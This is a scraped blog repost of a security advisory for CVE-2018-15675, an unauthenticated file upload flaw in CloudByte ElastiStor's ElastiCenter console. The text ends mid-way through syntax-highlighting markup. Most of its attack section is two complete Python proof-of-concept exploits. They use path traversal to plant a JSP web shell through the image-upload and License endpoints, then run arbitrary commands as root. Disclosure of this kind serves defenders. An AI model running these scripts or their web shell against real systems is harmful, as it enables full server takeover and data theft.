{"id":13181,"date":"2018-08-23T14:19:08","date_gmt":"2018-08-23T22:19:08","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2018\/08\/23\/news-6948\/"},"modified":"2018-08-23T14:19:08","modified_gmt":"2018-08-23T22:19:08","slug":"news-6948","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2018\/08\/23\/news-6948\/","title":{"rendered":"SSD Advisory \u2013 CloudByte ElastiStor OS Unauthenticated Remote Code Execution"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Ori Nimron| Date: Thu, 23 Aug 2018 10:57:33 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<div class=\"pf-content\">\n<p><strong>Vulnerabilities Summary<\/strong><\/p>\n<p>The following advisory describes two vulnerabilities found in ElastiCenter,<br \/> ElastiStor&#8217;s management console, File Injection that leads to unauthenticated remote code execution.<\/p>\n<p>ElastiCenter is the centralized management tool that you use to configure, monitor, manage, and deploy the services provided by CloudByte ElastiStor.<br \/> ElastiCenter lets you:<\/p>\n<ul>\n<li>Use the Graphical User Interface to manage the storage environment<\/li>\n<li>Generate statistical and configuration reports to help troubleshoot<\/li>\n<li>Delegate administration tasks<\/li>\n<li>Track events<\/li>\n<li>Globally control various settings<\/li>\n<\/ul>\n<p><strong>CVE<\/strong><br \/> CVE-2018-15675<\/p>\n<p><strong>Credit<\/strong><br \/> An independent security researcher has reported this vulnerability to Beyond Security&#8217;s SecuriTeam Secure Disclosure program.<br \/> <span id=\"more-3737\"><\/span><br \/> <strong>Affected systems<\/strong><br \/> CloudByte ElastiStor OS 2.1.0.1269<\/p>\n<p><strong>Vendor Response<\/strong><br \/> After several attempts to email CloudByte, we couldn&#8217;t get any response from the vendor.<\/p>\n<p><strong>Vulnerability Details<\/strong><br \/> ElastiCenter is vulnerable to unrestricted File Upload vulnerability found in 
\u201cLicense\u201d section and also in the image handling servlet. The purpose of the &#8220;License&#8221; is for administrative users to update the elasticenter license. Image handling servlet is responsible for image upload. Both sections have an upload functionality which could be accessed by unauthenticated remote attackers. Both sections allow to upload any file in any arbitrary location on the elasticenter host OS.<\/p>\n<p>By uploading a JSP file to the server, an attacker can execute it in the server context (in this case &#8220;root&#8221; user).<\/p>\n<p><strong>PoC<\/strong><br \/> The first poc Injects JSP web-shell through the image handling servlet:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5b7f32dbf052d317540932\" class=\"crayon-syntax crayon-theme-sublime-text crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-mixed-highlight\" title=\"Contains Mixed Languages\"><\/span><\/p>\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div 
class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> #!\/usr\/bin\/python  import requests  import sys  from requests.packages.urllib3.exceptions import InsecureRequestWarning    requests.packages.urllib3.disable_warnings(InsecureRequestWarning)    jspshell = &#8220;&#8221;&#8221;&lt;%@ page import=&#8221;java.io.*&#8221; %&gt;  &lt;%     String cmd = request.getParameter(&#8220;cmd&#8221;);     String output = &#8220;&#8221;;     if(cmd != null) {        String s = null;        try {           Process p = Runtime.getRuntime().exec(cmd);           BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));           while((s = sI.readLine()) != null) {              output += s;           }        }        catch(IOException e) {           e.printStackTrace();        }     }  %&gt;  &lt;%=output %&gt;&#8221;&#8221;&#8221;    print(&#8220;ElastiStore Remote RCE PoC&#8221;)  UPPATH = &#8220;\/client\/image&#8221;    if len(sys.argv) &lt; 3:      print(&#8220;Usage :&#8221;)      print(sys.argv[0] + &#8221; &lt;url_to_elasticenter&gt; &lt;cmd&gt;&#8221;)      print(sys.argv[0] + &#8221; https:\/\/192.168.200.200\/ &#8220;uname -a&#8221;&#8221;)      sys.exit(1)    s = requests.session()  xurl = sys.argv[1]  xcmd = sys.argv[2]    files = {&#8216;adminImage&#8217;:(&#8220;v1.jsp&#8221;, jspshell), &#8220;adminType&#8221;:&#8221;v1.jsp&#8221;, 
&#8220;adminName&#8221;:&#8221;..\/&#8221;,}  g=s.post(xurl+UPPATH, data={}, files=files, verify=False)    resp = s.get(xurl+&#8221;\/client\/images\/v1.jsp?cmd=&#8221;+xcmd, verify=False)  print(resp.content)<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">  \t\t\t\t  \t\t\t<\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0070 seconds] -->  <\/p>\n<p>Example run of poc1.py:<\/p>\n<p><a href=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/08\/poc1.png\" data-slb-active=\"1\" data-slb-asset=\"630661773\" data-slb-internal=\"0\" data-slb-group=\"3737\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone  wp-image-3739\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/08\/poc1-300x58.png\" alt=\"\" width=\"616\" height=\"119\" srcset=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/08\/poc1-300x58.png 300w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/08\/poc1.png 635w\" sizes=\"auto, (max-width: 616px) 100vw, 616px\" \/><\/a><\/p>\n<p>The second poc Injects JSP web-shell through the \u201cLicense\u201d section:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5b7f32dbf0538609791845\" class=\"crayon-syntax crayon-theme-sublime-text crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-mixed-highlight\" title=\"Contains Mixed Languages\"><\/span><\/p>\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div 
class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> #!\/usr\/bin\/python  import requests  import sys  from requests.packages.urllib3.exceptions import InsecureRequestWarning    requests.packages.urllib3.disable_warnings(InsecureRequestWarning)    jspshell = &#8220;&#8221;&#8221;&lt;%@ page import=&#8221;java.io.*&#8221; %&gt;  &lt;%     String cmd = request.getParameter(&#8220;cmd&#8221;);     String output = &#8220;&#8221;;     if(cmd != null) {        String s = null;        try {           Process p = Runtime.getRuntime().exec(cmd);           BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));           while((s = sI.readLine()) != null) {              output += s;           }        }        catch(IOException e) {           e.printStackTrace();        }     }  %&gt;  &lt;%=output %&gt;&#8221;&#8221;&#8221;    print &#8220;ElastiStore Remote RCE PoC 2&#8221;  UPPATH = &#8220;\/client\/license&#8221;    if len(sys.argv) &lt; 3:     
 print &#8220;Usage :&#8221;      print sys.argv[0] + &#8221; &lt;url_to_elasticenter&gt; &lt;cmd&gt;&#8221;      print sys.argv[0] + &#8221; https:\/\/192.168.200.200\/ &#8220;uname -a&#8221;&#8221;      sys.exit(1)    xurl = sys.argv[1]  xcmd = sys.argv[2]    s = requests.session()    files = {&#8216;fileToUpload&#8217;:(&#8220;..\/..\/images\/v2.jsp&#8221;, jspshell ), &#8220;mainui&#8221;:&#8221;mainui&#8221;}  g=s.post(xurl+UPPATH, data={}, files=files, verify=False)    resp = s.get(xurl+&#8221;\/client\/images\/v2.jsp?cmd=&#8221;+xcmd, verify=False)  print resp.content<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5b7f32dbf0538609791845-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7f32dbf0538609791845-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7f32dbf0538609791845-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7f32dbf0538609791845-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7f32dbf0538609791845-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7f32dbf0538609791845-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7f32dbf0538609791845-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7f32dbf0538609791845-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7f32dbf0538609791845-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7f32dbf0538609791845-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7f32dbf0538609791845-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7f32dbf0538609791845-12\">12<\/div>\n<div class=\"crayon-num\" 
data-line=\"crayon-5b7f32dbf0538609791845-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7f32dbf0538609791845-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7f32dbf0538609791845-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7f32dbf0538609791845-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7f32dbf0538609791845-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7f32dbf0538609791845-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7f32dbf0538609791845-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7f32dbf0538609791845-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7f32dbf0538609791845-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7f32dbf0538609791845-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7f32dbf0538609791845-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7f32dbf0538609791845-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7f32dbf0538609791845-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7f32dbf0538609791845-26\">26<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7f32dbf0538609791845-27\">27<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7f32dbf0538609791845-28\">28<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7f32dbf0538609791845-29\">29<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7f32dbf0538609791845-30\">30<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7f32dbf0538609791845-31\">31<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7f32dbf0538609791845-32\">32<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7f32dbf0538609791845-33\">33<\/div>\n<div class=\"crayon-num crayon-striped-num\" 
data-line=\"crayon-5b7f32dbf0538609791845-34\">34<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7f32dbf0538609791845-35\">35<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7f32dbf0538609791845-36\">36<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7f32dbf0538609791845-37\">37<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7f32dbf0538609791845-38\">38<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7f32dbf0538609791845-39\">39<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7f32dbf0538609791845-40\">40<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7f32dbf0538609791845-41\">41<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7f32dbf0538609791845-42\">42<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7f32dbf0538609791845-43\">43<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7f32dbf0538609791845-44\">44<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7f32dbf0538609791845-45\">45<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7f32dbf0538609791845-46\">46<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5b7f32dbf0538609791845-1\"><span class=\"crayon-p\">#!\/usr\/bin\/python<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7f32dbf0538609791845-2\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">requests<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7f32dbf0538609791845-3\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">sys<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7f32dbf0538609791845-4\"><span class=\"crayon-e\">from <\/span><span 
class=\"crayon-v\">requests<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">packages<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">urllib3<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">exceptions <\/span><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">InsecureRequestWarning<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7f32dbf0538609791845-5\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7f32dbf0538609791845-6\"><span class=\"crayon-v\">requests<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">packages<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">urllib3<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">disable_warnings<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">InsecureRequestWarning<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7f32dbf0538609791845-7\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7f32dbf0538609791845-8\"><span class=\"crayon-v\">jspshell<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;<span class=\"crayon-ta\">&lt;%<\/span><span class=\"crayon-sy\">@<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">page<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">import<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;java.io.*&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-ta\">%&gt;<\/span><\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7f32dbf0538609791845-9\"><span class=\"crayon-s\"><span class=\"crayon-ta\">&lt;%<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7f32dbf0538609791845-10\"><span class=\"crayon-h\">&nbsp;&nbsp; 
<\/span><span class=\"crayon-t\">String<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">cmd<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">request<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">getParameter<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;cmd&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7f32dbf0538609791845-11\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-t\">String<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">output<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7f32dbf0538609791845-12\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">cmd<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">!=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">null<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-k\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7f32dbf0538609791845-13\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">String<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">s<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">null<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7f32dbf0538609791845-14\"><span 
class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">try<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-k\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7f32dbf0538609791845-15\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-k\">Process<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Runtime<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">getRuntime<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">exec<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">cmd<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7f32dbf0538609791845-16\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-i\">BufferedReader<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">sI<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">BufferedReader<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-i\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">InputStreamReader<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">getInputStream<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" 
id=\"crayon-5b7f32dbf0538609791845-17\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-st\">while<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">s<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">sI<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">readLine<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">!=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">null<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-k\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7f32dbf0538609791845-18\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">output<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">s<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7f32dbf0538609791845-19\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-k\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7f32dbf0538609791845-20\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-k\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7f32dbf0538609791845-21\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">catch<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-i\">IOException<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">e<\/span><span 
class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-k\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7f32dbf0538609791845-22\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">e<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">printStackTrace<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7f32dbf0538609791845-23\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-k\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7f32dbf0538609791845-24\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-k\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7f32dbf0538609791845-25\"><span class=\"crayon-ta\">%&gt;<\/span><\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7f32dbf0538609791845-26\"><span class=\"crayon-s\"><span class=\"crayon-ta\">&lt;%=<\/span><span class=\"crayon-v\">output<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-ta\">%&gt;<\/span>&#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7f32dbf0538609791845-27\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7f32dbf0538609791845-28\"><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;ElastiStore Remote RCE PoC 2&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7f32dbf0538609791845-29\"><span class=\"crayon-v\">UPPATH<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;\/client\/license&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" 
id=\"crayon-5b7f32dbf0538609791845-30\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7f32dbf0538609791845-31\"><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">len<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7f32dbf0538609791845-32\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;Usage :&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7f32dbf0538609791845-33\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">print <\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8221; &lt;url_to_elasticenter&gt; &lt;cmd&gt;&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7f32dbf0538609791845-34\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">print <\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8221; 
